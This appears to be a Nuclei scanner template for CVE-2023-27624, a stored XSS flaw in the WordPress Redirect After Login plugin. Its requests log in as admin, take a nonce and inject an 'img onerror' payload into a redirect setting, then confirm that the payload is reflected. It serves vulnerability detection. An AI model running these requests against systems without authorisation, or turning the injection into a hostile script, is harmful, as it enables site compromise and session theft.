Marcelotorres Redirect After Login plugin <= 0.1.9 contains a stored cross-site scripting caused by insufficient sanitization in the login redirect parameter, letting attackers execute scripts in the context of the affected site, exploit requires admin privileges.
PoC代码[已公开]
id: CVE-2023-27624
info:
name: WordPress Redirect After Login <= 0.1.9 - Admin Stored XSS
author: 0x_Akoko
severity: medium
description: |
Marcelotorres Redirect After Login plugin <= 0.1.9 contains a stored cross-site scripting caused by insufficient sanitization in the login redirect parameter, letting attackers execute scripts in the context of the affected site, exploit requires admin privileges.
impact: |
Attackers can execute malicious scripts in the context of the affected site, potentially leading to session hijacking or defacement.
remediation: |
Update to the latest version of the plugin where the vulnerability is fixed.
reference:
- https://patchstack.com/database/vulnerability/redirect-after-login/wordpress-redirect-after-login-plugin-0-1-9-cross-site-scripting-xss-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-27624
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
cvss-score: 5.9
cve-id: CVE-2023-27624
cwe-id: CWE-79
epss-score: 0.00992
epss-percentile: 0.76377
cpe: cpe:2.3:a:redirect_after_login_project:redirect_after_login:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: redirect_after_login_project
product: redirect_after_login
framework: wordpress
tags: cve,cve2023,wordpress,wp-plugin,xss,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: status
status:
- 200
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{BaseURL}}/wp-admin/&testcookie=1
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(all_headers, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
GET /wp-admin/options-general.php?page=mtral HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Redirect After Login")'
condition: and
internal: true
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'name="_wpnonce" value="([a-f0-9]+)"'
internal: true
- raw:
- |
POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=mtral_settings&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dmtral&mtral_settings%5Bmtral_field_administrator%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_administrator%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&mtral_settings%5Bmtral_field_editor%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_editor%5D=&mtral_settings%5Bmtral_field_author%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_author%5D=&mtral_settings%5Bmtral_field_contributor%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_contributor%5D=&mtral_settings%5Bmtral_field_subscriber%5D={{RootURL}}&mtral_settings%5Bmtral_field_custom_url_subscriber%5D=&submit=Save+Changes
- |
GET /wp-admin/options-general.php?page=mtral HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'value=""><img src=x onerror=alert(document.domain)>"'
- 'mtral_field_custom_url_administrator'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 490a00463044022059b3d304ec5119072fd99646ea8d977a60d2e9dfed8f4dde4fae4ddd9969c1e102207ca1df6aed7732bd9df3b14734989b3851a1234d138b44a5d4a73b022d3858b4:922c64590222798bb761d5b6d8e72950